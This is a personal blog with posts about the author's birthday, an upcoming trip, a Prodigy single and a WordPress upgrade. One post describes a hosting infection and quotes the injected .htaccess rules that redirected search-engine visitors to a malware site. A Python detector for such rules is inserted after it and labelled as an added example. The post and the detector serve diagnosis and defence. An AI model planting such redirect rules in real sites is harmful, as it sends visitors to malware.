Happy Birthday To Me. I’m 32

I can’t believe I’m 32 already. It seems like only yesterday I wrote the post about my 31st birthday. But no… I checked and it was one year ago. So what happened over the last year? Let’s recount…

On the personal level, well… friends have gone in and out of my life, specifically one new friend that I’m inclined not to talk about which is unfortunate because the last month or so has been pretty great thanks to her. I’ve also spent the last 2 months getting ready for and planning my trip. That was nice, too. The next three months are going to be even better, but this stuff will be included in my post one year from now.

On the professional level, Diligent Technologies was acquired by IBM and now I’m an IBM employee. And two days from now I’ll be an IBM employee on a 3-month vacation. Take that, suckers :) Seriously, though, working for IBM is still not too much different – we do the same work, only we got many more big black IBM boxes in our lab than before, a new coffee machine, constant cereal supply and laptops. The switch from a startup to a huge company has been kind of exciting. To say the least, it’s a once-in-a-lifetime experience.

So it’s been a pretty eventful year. That’s a good thing. When I started writing I thought it was going to be another “nothing much happened” post, but it turned out to be more satisfying than that.

All 6 readers of this blog are welcome to leave their birthday wishes in the comments. Calling is even better :)

This Blog Was Hijacked. Shame On IX Web Hosting

Yesterday my brother called me up to let me know that when clicking a link in Google Reader to get to this blog, a malicious website appears instead of the blog. I tried it myself and he was right. The strange thing was that if you entered the address yourself it worked; only if you clicked a link inside Google Reader would you get to the malicious website.

I tried looking for what could have gone wrong. As I couldn’t find anything, I assumed maybe some kind of DNS poisoning occurred, that the solution is out of my reach and that if I wait it out a little bit everything will be back to normal.

So today I checked again and the problem still persisted. I decided to look further into things. Remembering an email message I got from my host, IX Web Hosting, I looked it up. Here it is:

Dear Amit,

In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our clients’ websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.

We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.

While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:

1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/malware-removal/uninstall-antivirus-2009

2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.

To illustrate the severity of the issue I would like to share some facts with you:

* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system

We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.

If you have questions regarding any of this information, please contact our support team anytime.

Kind Regards,

Fatima Said, CCO
IX Web Hosting
http://www.ixwebhosting.com

When I first got this message I thought it was a hoax. Considering that the computers I use to access my website all have Linux installed, “blaming” me for having the infamous Anti-Virus 2009 (which is a relatively new and very aggressive virus) on my computers is simply wrong, being impossible and all. So I ignored the message but still kept it (I thought about contacting IX Web Hosting to ask whether this was real but just forgot about it.)

Reading the message from IX Web Hosting again, though, got me to check my .htaccess file. And indeed the file contained the following lines:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://10.0.0.1/join.html?s=join [R,L]

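These lines mean that if you get to this website from any of the well-known search engines you will be redirected to the address on the last line (I changed the IP address intentionally.) Each RewriteCond is a case-insensitive ([NC]) pattern match against the HTTP Referer header, and the [OR] flags mean that any one match is enough to trigger the RewriteRule. A directly typed address sends no Referer, while a link clicked inside Google Reader sends one that matches the first pattern. Once I deleted the file from the website’s root directory everything was back to normal. Now I wanted to know how long my blog had been hijacked. My Google Analytics account revealed the answer: my search engine sources dropped to almost zero around December 14th (about a month ago.)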
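A defensive check for the pattern described above, as an added example that is not part of the original post: it flags any RewriteRule that sends visitors to an absolute URL on another host when the rule is guarded by Referer conditions. The function name, the own_hosts parameter and both sample inputs are assumptions constructed for illustration.

```python
import re

# Constructed sample: an excerpt of the injected rules quoted in the post
# (the IP address was already altered by the post's author).
SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://10.0.0.1/join.html?s=join [R,L]
"""

# Constructed benign sample: a typical WordPress permalink block.
BENIGN = """\
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
"""

REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
ANY_COND = re.compile(r"^\s*RewriteCond\b", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)

def find_referer_redirects(text, own_hosts=()):
    """Return (line_no, target, referer_patterns) for every RewriteRule whose
    target is an absolute URL on a host outside own_hosts and whose preceding
    RewriteCond lines test the Referer header."""
    findings, referers = [], []
    for no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # comments do not separate conditions from their rule
        cond = REFERER_COND.match(line)
        if cond:
            referers.append(cond.group(1))
            continue
        if ANY_COND.match(line):
            continue  # condition on something other than the Referer
        rule = RULE.match(line)
        if rule:
            target = rule.group(1)
            host = re.match(r"https?://([^/:]+)", target, re.I)
            if referers and host and host.group(1).lower() not in own_hosts:
                findings.append((no, target, list(referers)))
            referers = []  # conditions apply only to the next RewriteRule
    return findings
```

Running it over every .htaccess file in the web root, with own_hosts set to the site's own domain names, surfaces this kind of injected redirect without having to visit the site through a search engine.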

Digging further, I found this post on the IX Web Hosting Warning blog. The writer of the post seems to think, like me, that IX Web Hosting are simply trying to shift the blame to the customers, which is a big shame.

Up until today I was generally happy with IX Web Hosting. I almost never had any problems with the website and whenever I needed support they answered quickly and resolved any issues I had. But reading through the IX Web Hosting Warning blog made me want to switch hosts (again.) I guess I’ll do that when I’m back from my trip and hope for the best until then. I just can’t be bothered right now with switching hosts.

The “Big Trip”

I wanted to post about my upcoming 3-month-long trip for a while now, but I was just… well… lazy.

The trip starts January 25th, just 2 days after my 32nd birthday. I’ll be back in Israel April 19th. The general plan is:

  • 5 weeks in the US. Basically a coast-to-coast trip which includes visiting friends along the way. I still have to plan a course for this part of the trip
  • 3 weeks in Thailand, where I plan to lie around on some beach and do nothing.
  • 3 weeks in the UK. Meeting friends and going to 4 Prodigy shows is what I currently have in mind.

All 6 readers of this blog are welcome to call and say their goodbyes.

The Prodigy – Invaders Must Die

Yesterday The Prodigy released their new single, Invaders Must Die, which will be the opening track of an album by the same name to be released March 2nd. Personally I love the new track. It’s fresh and fun to listen to. However, most “hardcore” fans are pretty disappointed.

You can download the track for free from the download page in the next 6 days or listen to it right here (quality and loud headphones/speakers recommended.)

This Is An Upgraded Blog

Finally I took the time and courage to update my blog’s software. It is now running WordPress 2.6.3, the latest and greatest from the good people at WordPress.org. To upgrade the blog I first had to convert the database to a utf8_unicode_ci collation. It was already Unicode, but the collation wasn’t set right. That was frightening stuff by itself, since these kinds of changes can convert all my Hebrew posts to common gibberish. Naturally I tested this on my home copy of the blog and had everything backed up beforehand, but still…

The upgrade process went very smoothly and lasted for about 15 minutes (I doubt any of the 6 readers of this blog saw the “I’m upgrading” message I put on the front page). I chose the extended upgrade instructions, which include the scary step of deleting almost everything from the server. But it’s the cleaner way to go. I was pleasantly surprised to learn that WordPress now supports “Unicode connections” (or whatever the formal name is) to the database, so I don’t need to hack the wp-db.php file like I used to after previous upgrades.

The reason for the upgrade is my upcoming trip. I would like to use the blog to post updates and pictures from the trip. I still need to choose a solution for posting pictures. There are many to choose from.

Hebrew is still aligned to the left. I’ll get to that soon. Now… let’s see if this post goes through :)